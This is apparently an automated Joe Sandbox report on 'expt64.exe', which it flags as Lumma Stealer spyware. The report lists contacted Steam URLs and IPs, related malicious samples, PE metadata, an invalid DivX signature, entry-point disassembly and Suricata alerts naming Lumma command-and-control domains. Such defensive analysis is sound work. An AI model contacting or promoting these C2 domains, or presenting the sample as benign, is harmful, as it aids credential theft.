https://checkout.steampowered.com/	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	expt64.exe	false		high
https://help.steampowered.com/en/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	expt64.exe	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en	expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steamp	expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	expt64.exe	false		high
https://help.stC	expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/stats/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false
104.21.64.1	sputnik-1985.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587438
Start date and time:	2025-01-10 11:35:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	expt64.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 128
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:36:19	API Interceptor	11x Sleep call for process: expt64.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm
104.21.64.1	1162-201.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sputnik-1985.com	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	[UPD]Intel_Unit.2.1.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.96.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	BnJxmraqlk.exe	Get hash	malicious	LummaC, PrivateLoader	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer	Browse	104.21.96.1
	NjFiIQNSid.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
steamcommunity.com	1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SensorExpo.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	cache_registerer.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	Invoice.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	NvOxePa.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	h3VYJaQqI9.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	P2V7Mr3DUF.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	v3tb7mqP48.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SensorExpo.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	cache_registerer.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	armv5l.elf	Get hash	malicious	Unknown	Browse	23.209.153.127
	http://postman.com/	Get hash	malicious	Unknown	Browse	104.102.43.106
	https://sanctionssearch.ofac.treas.gov	Get hash	malicious	Unknown	Browse	23.49.251.37
	Fantazy.ppc.elf	Get hash	malicious	Unknown	Browse	104.81.98.224
	Fantazy.x86.elf	Get hash	malicious	Unknown	Browse	184.28.181.149
CLOUDFLARENETUS	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	https://we.tl/t-fnebgmrnYQ	Get hash	malicious	Unknown	Browse	104.26.0.90
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	Undelivered Messages.htm	Get hash	malicious	Unknown	Browse	104.21.84.200
	driver.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	XClient.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	http://pdfdrive.com.co	Get hash	malicious	Unknown	Browse	104.21.11.245
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1
	SensorExpo.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.64.1
	cache_registerer.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.64.1
	CY SEC AUDIT PLAN 2025.docx.doc	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.64.1
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.102.49.254 104.21.64.1
	Invoice.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.64.1
	24EPV9vjc5.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.64.1
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.64.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.968885257941795
TrID:	Win32 Executable (generic) a (10002005/4) 98.45% Inno Setup installer (109748/4) 1.08% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	expt64.exe
File size:	10'171'362 bytes
MD5:	c4cb62a984955f3ad185c1b289d816d9
SHA1:	afaa3f895bc307c7dc41f9641a5c757a82e0c5fb
SHA256:	a42ce4178e7dc0be9b8f8b91ef4af38e05c66c587b7ae80840cc60f45051d773
SHA512:	e71787abde38d3c502f79299eb55b881481679cd450cd06439a40c89273e1af8f5bd6bb892fbc916a6c92154c5c5553fb86db2b3143bbd24b15b013122e6643f
SSDEEP:	196608:rhnqDr/8t91hdgoTEPP/Ts5IjIxdZDr/8t91hdgoTEPP/Ts5IjIxN:pqDr/8tlmUuPbMIEXZDr/8tlmUuPbMIo
TLSH:	F2A6233FB2A8B13EC4AA1631CAB3A320687BB665F1178E5E47F4050DCF264641E3F655
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2703494b4f060606

Static PE Info

General

Entrypoint:	0x4b5eec
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63ECF218 [Wed Feb 15 14:54:16 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	e569e6f445d32ba23766ad67d1e3787f

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	23/02/2024 01:00:00 23/02/2025 00:59:59
Subject Chain	CN="DivX, LLC", O="DivX, LLC", S=California, C=US, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=201810310435
Version:	3
Thumbprint MD5:	2DA7E2FF6C3973639DFBA8BB9E4E8615
Thumbprint SHA-1:	41DE7F0598117740C1C4B902EFF1C261E256D50D
Thumbprint SHA-256:	B3CB3F863CCBA1BA364136E4767F93E317EF11CB65B8E808FBC5846F85CCF38B
Serial:	00A9C1AA622FEF40C072052147482DF95B

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004B14B8h
call 00007F64A460C0D5h
xor eax, eax
push ebp
push 004B65E2h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004B659Eh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004BE634h]
call 00007F64A46AEBC7h
call 00007F64A46AE71Ah
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F64A4621B74h
mov edx, dword ptr [ebp-14h]
mov eax, 004C1D84h
call 00007F64A4606CC7h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004C1D84h]
mov dl, 01h
mov eax, dword ptr [004238ECh]
call 00007F64A4622CF7h
mov dword ptr [004C1D88h], eax
xor edx, edx
push ebp
push 004B654Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F64A46AEC4Fh
mov dword ptr [004C1D90h], eax
mov eax, dword ptr [004C1D90h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F64A46B4E6Ah
mov eax, dword ptr [004C1D90h]
mov edx, 00000028h
call 00007F64A46235ECh
mov edx, dword ptr [004C1D90h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc4000	0x9a	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2000	0xfdc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5da00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x9b0a62	0x2980
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc6000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc22f4	0x254	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xc3000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb39e4	0xb3a00	571a33ab29f75930f860c76fe6d0a5cf	False	0.3463038774356298	data	6.362666353971951	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xb5000	0x1688	0x1800	185e04b9a1f554e31f7f848515dc890c	False	0.54443359375	data	5.971425428435973	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xb7000	0x37a4	0x3800	cab2107c933b696aa5cf0cc6c3fd3980	False	0.36097935267857145	data	5.048648594372454	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xbb000	0x6de8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xc2000	0xfdc	0x1000	e7d1635e2624b124cfdce6c360ac21cd	False	0.3798828125	data	5.029087481102678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xc3000	0x1a4	0x200	8ced971d8a7705c98b173e255d8c9aa7	False	0.345703125	data	2.7509822285969876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xc4000	0x9a	0x200	8d4e1e508031afe235bf121c80fd7d5f	False	0.2578125	data	1.877162954504408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xc5000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xc6000	0x5d	0x200	8f2f090acd9622c88a6a852e72f94e96	False	0.189453125	data	1.3838943752217987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc7000	0x5da00	0x5da00	4fc770675f55441ae49e1dec36d57128	False	0.6438219709612817	data	7.440040750203299	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.43949893390191896
RT_ICON	0xc8400	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.45306859205776173
RT_ICON	0xc8ca8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.5505780346820809
RT_ICON	0xc9210	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 0	English	United States	0.14876543209876544
RT_ICON	0xc9eb8	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 0	English	United States	0.22477064220183487
RT_ICON	0xca220	0x1734	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9705387205387206
RT_ICON	0xcb954	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.18651452282157677
RT_STRING	0xcdefc	0x360	data			0.34375
RT_STRING	0xce25c	0x260	data			0.3256578947368421
RT_STRING	0xce4bc	0x45c	data			0.4068100358422939
RT_STRING	0xce918	0x40c	data			0.3754826254826255
RT_STRING	0xced24	0x2d4	data			0.39226519337016574
RT_STRING	0xceff8	0xb8	data			0.6467391304347826
RT_STRING	0xcf0b0	0x9c	data			0.6410256410256411
RT_STRING	0xcf14c	0x374	data			0.4230769230769231
RT_STRING	0xcf4c0	0x398	data			0.3358695652173913
RT_STRING	0xcf858	0x368	data			0.3795871559633027
RT_STRING	0xcfbc0	0x2a4	data			0.4275147928994083
RT_RCDATA	0xcfe64	0x10	data			1.5
RT_RCDATA	0xcfe74	0x2c4	data			0.6384180790960452
RT_RCDATA	0xd0138	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0xd0164	0x68	data	English	United States	0.7211538461538461
RT_VERSION	0xd01cc	0x584	data	English	United States	0.29036827195467424
RT_MANIFEST	0xd0750	0x7a8	XML 1.0 document, ASCII text, with very long lines (391), with CRLF line terminators	English	United States	0.3464285714285714

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4541a8
__dbk_fcall_wrapper	2	0x40d0a0
dbkFCallWrapperAddr	1	0x4be63c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T11:36:19.519203+0100	2058039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)	1	192.168.2.12	56350	1.1.1.1	53	UDP
2025-01-10T11:36:19.532991+0100	2058514	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)	1	192.168.2.12	64590	1.1.1.1	53	UDP
2025-01-10T11:36:19.543790+0100	2058502	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)	1	192.168.2.12	56265	1.1.1.1	53	UDP
2025-01-10T11:36:19.558399+0100	2058492	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)	1	192.168.2.12	54281	1.1.1.1	53	UDP
2025-01-10T11:36:19.573166+0100	2058500	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)	1	192.168.2.12	53122	1.1.1.1	53	UDP
2025-01-10T11:36:19.584352+0100	2058510	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)	1	192.168.2.12	56378	1.1.1.1	53	UDP
